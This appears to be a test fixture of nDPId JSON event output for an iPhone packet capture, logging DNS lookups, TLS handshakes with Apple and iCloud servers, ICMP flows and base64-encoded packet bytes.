00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454598758,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598758,"pkt":"xGGLNYKpxiwDYGpkCABFAADPdQkAAEARf7LAqAIBwKgCEQA10t8AuwWPZlqBgAABAAQAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACYIaW5pdC1jZG4MaXR1bmVzLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAyAAUAAQAAC+cAGwZpdHVuZXMFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAGARlNjczBWRzY2U5CmFrYW1haWVkZ2XAU8CLAAEAAQAAABcABF9lGDU="}
00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454598759,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1582454598759,"pkt":"xGGLNYKpxiwDYGpkCABFAADQatgAAEARieLAqAIBwKgCEQA1wtgAvFoLcEmBgAABAAQAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAJGQAmCGluaXQtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAABEeABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAbAARfZRg1"}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADjlzEAAEARXXbAqAIBwKgCEQA10BgAz2vgCAuBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMPAAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOnACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXwAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAPAARce00awJMAAQABAAAADwAEXHtNQA=="}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}}
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADGO68AAEARuRXAqAIBwKgCEQA19D4AssJtjeyBgAABAAQAAAAAA2NsNAVhcHBsZQNjb20AAAEAAcAMAAUAAQAAD1IAJQdjbDQtY2RuDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADAKwAFAAEAAABkABgDY2w1BWFwcGxlA2NvbQdlZGdla2V5wEvAXAAFAAEAABGWABoGZTE0ODY4BWRzY2U5CmFrYW1haWVkZ2XAS8CAAAEAAQAAAA8ABGhJPR4="}
00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.73.61.30"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598766,"flow_last_seen":1582454598766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598766,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454598766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598766,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGHzLAqAIRXHr8UsWWAbuHn+lSAAAAALDC\/\/\/nwQAAAgQFtAEDAwcBAQgKEd\/ozwAAAAAEAgAA"}
01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454598801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598801,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGajZcevxSwKgCEQG7xZaFiMYch5\/pU6BScSAUDwAAAgQFrAQCCAr\/dyjxEd\/ozwEDAwc="}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454598867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598867,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+7MR+LlXwKgCEQG7xZWfE+IlqBre6aBScSBsSgAAAgQFrAEBCArpLCwFEd\/opwEDAwU="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598766,"flow_last_seen":1582454598766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598766,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454598766,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598766,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGHzLAqAIRXHr8UsWWAbuHn+lSAAAAALDC\/\/\/nwQAAAgQFtAEDAwcBAQgKEd\/ozwAAAAAEAgAA"}
01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454598801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598801,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGajZcevxSwKgCEQG7xZaFiMYch5\/pU6BScSAUDwAAAgQFrAQCCAr\/dyjxEd\/ozwEDAwc="}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454598867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598867,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+7MR+LlXwKgCEQG7xZWfE+IlqBre6aBScSBsSgAAAgQFrAEBCArpLCwFEd\/opwEDAwU="}
00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454598885,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598885,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4434AAEABEeTAqAIRwKgCAQMDBHsAAAAARQAAz8hDAABAESx4wKgCAcCoAhEANfeRALsAAA=="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454598886,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4zMkAAEABKJnAqAIRwKgCAQMDKS0AAAAARQAAz3UJAABAEX+ywKgCAcCoAhEANdLfALsAAA=="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454598886,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4CTAAAEAB7DLAqAIRwKgCAQMDOTMAAAAARQAA0GrYAABAEYniwKgCAcCoAhEANcLYALwAAA=="}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598888,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598888,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG0pfAqAIRaEk9HsWXAbvBeeAaAAAAALDC\/\/9qCgAAAgQFtAEDAwcBAQgKEd\/pSQAAAAAEAgAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGHz7AqAIRXHr8UsWWAbuHn+lThYjGHYAQBAuvrgAAAQEIChHf6Un\/dyjx"}
00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454598892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598892,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrLvAqAIREfi5V8WVAbuoGt7pnxPiJoAQBAsEtQAAAQEIChHf6VPpLCwF"}
00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454598926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598926,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGHZxoST0ewKgCEQG7xZdpIXVbwXngG6BScSBpXgAAAgQFrAQCCAqgrSHdEd\/pSQEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598934,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG0qPAqAIRaEk9HsWXAbvBeeAbaSF1XIAQBAsFUQAAAQEIChHf6XCgrSHd"}
00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
